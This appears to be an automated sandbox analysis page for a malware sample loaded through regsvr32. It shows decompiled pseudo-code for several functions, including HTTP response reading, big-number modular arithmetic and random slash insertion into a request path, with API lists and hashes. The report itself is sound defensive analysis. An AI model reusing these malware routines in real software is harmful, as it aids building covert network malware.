Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 27be102e10551cd8562e26d668dc7e93ee71593e7161c949d7002d2ae432d9ec
Instruction ID: 8d523d5a7a577a7b204e487cb6f0c63df1d064116cab87770c9a09253e450e65
Opcode Fuzzy Hash: 27be102e10551cd8562e26d668dc7e93ee71593e7161c949d7002d2ae432d9ec
Instruction Fuzzy Hash: 80F0AF78A85309DBE7609F38AD09B183FA0A762760F000515FE06C62F0E2F08541FB16

Uniqueness

Uniqueness Score: -1.00%

Function 00F44D36, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00F44D36(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xf4d27c; // 0x47ea5a8
					_t5 = _t102 + 0xf4e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xf4c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xf4d27c; // 0x47ea5a8
												_t28 = _t108 + 0xf4e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xf4d27c; // 0x47ea5a8
														_t33 = _t78 + 0xf4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00f44d3b
0x00f44d44
0x00f44d45
0x00f44d49
0x00f44d4f
0x00f44d55
0x00f44d5e
0x00f44d64
0x00f44d6e
0x00f44d70
0x00f44d76
0x00f44d7b
0x00f44d86
0x00f44d8e
0x00f44d91
0x00f44eb4
0x00f44d97
0x00f44d97
0x00f44da4
0x00f44daa
0x00f44db0
0x00f44db4
0x00f44dba
0x00f44dc7
0x00f44dcb
0x00f44dd1
0x00f44dd4
0x00f44dda
0x00f44de0
0x00f44de6
0x00f44de9
0x00f44dec
0x00f44df2
0x00f44dfb
0x00f44e01
0x00f44e02
0x00f44e05
0x00f44e06
0x00f44e07
0x00f44e0f
0x00f44e10
0x00f44e11
0x00f44e13
0x00f44e17
0x00f44e1b
0x00000000
0x00000000
0x00f44e21
0x00f44e2a
0x00f44e30
0x00f44e3a
0x00f44e3e
0x00f44e40
0x00f44e4d
0x00f44e51
0x00f44e59
0x00f44e5e
0x00f44e70
0x00f44e72
0x00f44e78
0x00f44e78
0x00f44e81
0x00f44e81
0x00f44e83
0x00f44e89
0x00f44e89
0x00f44e8c
0x00f44e92
0x00f44e95
0x00f44e9e
0x00000000
0x00000000
0x00000000
0x00f44e9e
0x00f44df2
0x00f44dec
0x00f44dd4
0x00f44ea4
0x00f44ea4
0x00f44eaa
0x00f44eaa
0x00f44eb0
0x00f44eb0
0x00f44eb9
0x00f44ebf
0x00f44ebf
0x00f44d7b
0x00f44ec8

APIs

SysAllocString.OLEAUT32(00F4C2B0), ref: 00F44D86
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00F44E68
SysFreeString.OLEAUT32(00000000), ref: 00F44E81
SysFreeString.OLEAUT32(?), ref: 00F44EB0

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 27d3a32cd048bfe4d308212ee6c128f9389abe2c3580daf25e264be9320e5adb
Instruction ID: 748cebb6d8d643b87d43b6a4e118483a8305242eb4426f0d899d22733cd76259
Opcode Fuzzy Hash: 27d3a32cd048bfe4d308212ee6c128f9389abe2c3580daf25e264be9320e5adb
Instruction Fuzzy Hash: 3E511B75D00519EFCB10DFA8C8889AEBBB9FF89704B148598ED15FB210D771AD41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F46D76, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F46D76(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00F48FAC(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00F48CF6(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00F43F82(_t101,  &_v236, _a8, _t96 - _t81);
					E00F43F82(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00F48CF6(_t101,  &E00F4D1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00F48CF6(_a16, _a4);
						E00F4862E(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00F4B068();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00F4B062();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00F450CB(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00F416D8(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00F4906C(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00F4D1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00f46d79
0x00f46d85
0x00f46d8b
0x00f46d90
0x00f46d94
0x00f46ef1
0x00f46ef5
0x00f46ef5
0x00f46d9a
0x00f46d9e
0x00f46da4
0x00f46da5
0x00f46db0
0x00f46db6
0x00f46dbb
0x00f46dbe
0x00f46dd8
0x00f46de4
0x00f46ded
0x00f46df7
0x00f46dfc
0x00f46dfe
0x00f46e01
0x00f46eaf
0x00f46eb5
0x00f46ec6
0x00f46ed9
0x00f46ee9
0x00000000
0x00f46eee
0x00f46e0a
0x00f46e11
0x00f46e15
0x00f46e1b
0x00f46e1d
0x00f46e1f
0x00f46e21
0x00f46e23
0x00f46e2d
0x00f46e32
0x00f46e34
0x00f46e36
0x00f46e37
0x00f46e38
0x00f46e39
0x00f46e40
0x00f46e47
0x00f46e4a
0x00f46e4a
0x00f46e17
0x00f46e17
0x00f46e17
0x00f46e52
0x00f46e5a
0x00f46e63
0x00f46e68
0x00f46e68
0x00f46e6d
0x00000000
0x00000000
0x00f46e6f
0x00f46e72
0x00f46e7c
0x00000000
0x00000000
0x00f46e7e
0x00f46e7e
0x00f46e88
0x00f46e68
0x00f46e6d
0x00000000
0x00000000
0x00000000
0x00f46e6d
0x00f46e92
0x00f46e95
0x00f46e98
0x00f46e9f
0x00f46e9f
0x00f46eac
0x00000000
0x00f46eac
0x00f46da7
0x00f46dab
0x00f46dac
0x00f46dae
0x00000000
0x00000000
0x00000000
0x00f46dae
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00F46E23
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00F46E39
memset.NTDLL ref: 00F46ED9
memset.NTDLL ref: 00F46EE9

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: b491feb1cd302153eff701ce77ed935eec0d8ee0ee68f9b16d67866a8c9dac7b
Instruction ID: 1b0842e34a2406e2f28e717799f24a6731331a823757ba2350890985c4794e39
Opcode Fuzzy Hash: b491feb1cd302153eff701ce77ed935eec0d8ee0ee68f9b16d67866a8c9dac7b
Instruction Fuzzy Hash: B241D471A00209ABDB10DFA8CC81BEE7BB4EF45720F008529FD16E7281EB749E55EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A953, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,73B74D40), ref: 00F4A965

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

ResetEvent.KERNEL32(?), ref: 00F4A9D9
GetLastError.KERNEL32 ref: 00F4A9FC
GetLastError.KERNEL32 ref: 00F4AAA7

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 9e5d23cda335e1f2d9a984f6959ff1c419d046ec34cd6d8c9a4622c0621e5482
Instruction ID: 1f4fa2d68c29188f4505391db262e804fb06e2e77515386671b04bb27d74fed6
Opcode Fuzzy Hash: 9e5d23cda335e1f2d9a984f6959ff1c419d046ec34cd6d8c9a4622c0621e5482
Instruction Fuzzy Hash: 52418EB5A40248FFE7319F65CC48EAB7FBDEB96700F100929F942E10A0E7749945EB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F454D2, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00F454D2(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0xf4d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0xf4d168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E00F43727(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0xf4d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E00F46CC8( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E00F46EF8(_v16);
										if(_t64 == 0) {
											_t64 = E00F4873A(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E00F46CC8( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E00F49956(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x00f454d2
0x00f454d3
0x00f454d9
0x00f454e4
0x00f454e4
0x00f454e6
0x00f48d5b
0x00f48d60
0x00f48d62
0x00f48d67
0x00f48d68
0x00f48d6d
0x00f48d6e
0x00f48d79
0x00f48daa
0x00f48daf
0x00f48e72
0x00f48db5
0x00f48dbc
0x00f48dc4
0x00f48e6f
0x00f48dca
0x00f48dcf
0x00f48dd6
0x00f48dd9
0x00f48e61
0x00f48ddf
0x00f48ddf
0x00f48de1
0x00f48de7
0x00f48de8
0x00f48de8
0x00f48deb
0x00f48dee
0x00f48df4
0x00f48df9
0x00f48dfa
0x00f48dff
0x00f48e02
0x00f48e0d
0x00000000
0x00000000
0x00f48e15
0x00f48e1d
0x00f48e29
0x00f48e2d
0x00f48e2f
0x00f48e34
0x00000000
0x00000000
0x00f48e34
0x00f48e2d
0x00f48e46
0x00f48e49
0x00f48e50
0x00f48e5b
0x00f48e5b
0x00000000
0x00f48e36
0x00f48e36
0x00f48e3b
0x00f48e3d
0x00f48e3e
0x00f48e41
0x00000000
0x00f48e41
0x00000000
0x00f48e3b
0x00f48de8
0x00f48e62
0x00f48e62
0x00f48e68
0x00f48e68
0x00f48dc4
0x00f48d7b
0x00f48d81
0x00f48d89
0x00f48da2
0x00f48da4
0x00000000
0x00000000
0x00f48d8b
0x00f48d95
0x00f48d99
0x00f48d9f
0x00000000
0x00f48d9f
0x00f48d99
0x00f48d89
0x00f48e7b
0x00f454db
0x00f454db
0x00f454e2
0x00f454ed
0x00000000
0x00000000
0x00000000
0x00f454e2

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,73BB81D0), ref: 00F48D62
GetLastError.KERNEL32(?,?,?,00000000,73BB81D0), ref: 00F48D7B
ResetEvent.KERNEL32(?), ref: 00F48DF4
GetLastError.KERNEL32 ref: 00F48E0F

Part of subcall function 00F49956: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 00F4996D
Part of subcall function 00F49956: SetEvent.KERNEL32(?), ref: 00F4997D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: a1aac016289ceae3727c30cb5f7a499921af43280810bf2be3c73304921f2848
Instruction ID: 4d782f65217feebf93e9e12c341468665c996a5535b5913b79d193ab232b5c33
Opcode Fuzzy Hash: a1aac016289ceae3727c30cb5f7a499921af43280810bf2be3c73304921f2848
Instruction Fuzzy Hash: E641B436A00604EFDB219BE5CC44A6F7BB9AF947B0F200564ED55E71A0EB70DD42BB10

Uniqueness

Uniqueness Score: -1.00%

Function 00F49956, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00F49956(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xf4d144; // 0xf4ad21
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00F43727(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00F46EF8(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00F46CC8( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x00f49956
0x00f49956
0x00f49960
0x00f49966
0x00f49969
0x00f4996d
0x00f49975
0x00f49978
0x00f49991
0x00f49994
0x00f49998
0x00f4999c
0x00f4999d
0x00f499a2
0x00f499a5
0x00f499ac
0x00f499b3
0x00f49a06
0x00f49a0f
0x00f49a12
0x00f49a4d
0x00f49a53
0x00000000
0x00000000
0x00000000
0x00f49a12
0x00f499b9
0x00000000
0x00f499c0
0x00f499ce
0x00f499d1
0x00f499d4
0x00f499e0
0x00f499e4
0x00f49a46
0x00f499e6
0x00f499e9
0x00f499ed
0x00f499ee
0x00f499ef
0x00f499f1
0x00f499f8
0x00f49a36
0x00f49a41
0x00f499fa
0x00f499fd
0x00f49a01
0x00f49a01
0x00f499f8
0x00000000
0x00f499e4
0x00f499b9
0x00f4997d
0x00f49983
0x00f49988
0x00f4998b
0x00000000
0x00000000
0x00000000
0x00f49a1b
0x00f49a23
0x00f49a2a
0x00f49a2a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 00F4996D
SetEvent.KERNEL32(?), ref: 00F4997D
GetLastError.KERNEL32 ref: 00F49A06

Part of subcall function 00F46CC8: WaitForMultipleObjects.KERNEL32(00000002,00F4AA1A,00000000,00F4AA1A,?,?,?,00F4AA1A,0000EA60), ref: 00F46CE3

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

GetLastError.KERNEL32(00000000), ref: 00F49A3B

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: b709db07d93288aecb22eb98efa9754583c501196ea71c3ed64145c7841cbf51
Instruction ID: 9f9bdec41c7a13fdb1f0fdff6127e03b91ead9a6090c7f2acc06cbc2b4f28fa1
Opcode Fuzzy Hash: b709db07d93288aecb22eb98efa9754583c501196ea71c3ed64145c7841cbf51
Instruction Fuzzy Hash: F9312CB5E04309FFDB20DF95CC8099FBFB8EB18350F10456AE942E2551D774AA44AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F4575F, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F4575F(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xf4d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xf4d250; // 0x9679bdcb
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xf4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00f45767
0x00f4576a
0x00f45770
0x00f45788
0x00f4578c
0x00f4578f
0x00f45791
0x00f45794
0x00f45796
0x00f45799
0x00f4579b
0x00f4579b
0x00f4579d
0x00f457a8
0x00f457ad
0x00f457be
0x00f457c6
0x00f457cb
0x00f457ce
0x00f457d1
0x00f457d3
0x00f457d9
0x00f457dc
0x00f457dc
0x00f457dc
0x00f457e7
0x00f457ec
0x00f457f6

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00F48419,00000000,?,?,00F4987D,?,057395B0), ref: 00F4576A
RtlAllocateHeap.NTDLL(00000000,?), ref: 00F45782
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00F48419,00000000,?,?,00F4987D,?,057395B0), ref: 00F457C6
memcpy.NTDLL(00000001,?,00000001), ref: 00F457E7

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4e361803c58c894715f83ec907a5dc1e63b17690a96378f92f531f6c75f55908
Instruction ID: 33fbb635b89904f19f8de93eb9c8063dfee85a0ef2b6c85ac764fc44cfd23984
Opcode Fuzzy Hash: 4e361803c58c894715f83ec907a5dc1e63b17690a96378f92f531f6c75f55908
Instruction Fuzzy Hash: F5110676A00219ABD7109F69DC84D9EBFAAEB91760B040176F805D7151EA749E04E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49111, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00F49111(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00F490BE(_t8, _t1);
				_t16 = E00F43727(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00F444A8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00F43727(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00F46EF8(_t16);
				}
				return _t18;
			}

0x00f4911c
0x00f4911d
0x00f49120
0x00f49122
0x00f4912d
0x00f49131
0x00f49136
0x00f4913a
0x00f49142
0x00f49147
0x00f4914f
0x00f4914f
0x00f49158
0x00f4915c
0x00f49162
0x00f49165
0x00f4916b
0x00f4916b
0x00f49173
0x00f49173
0x00f4917a
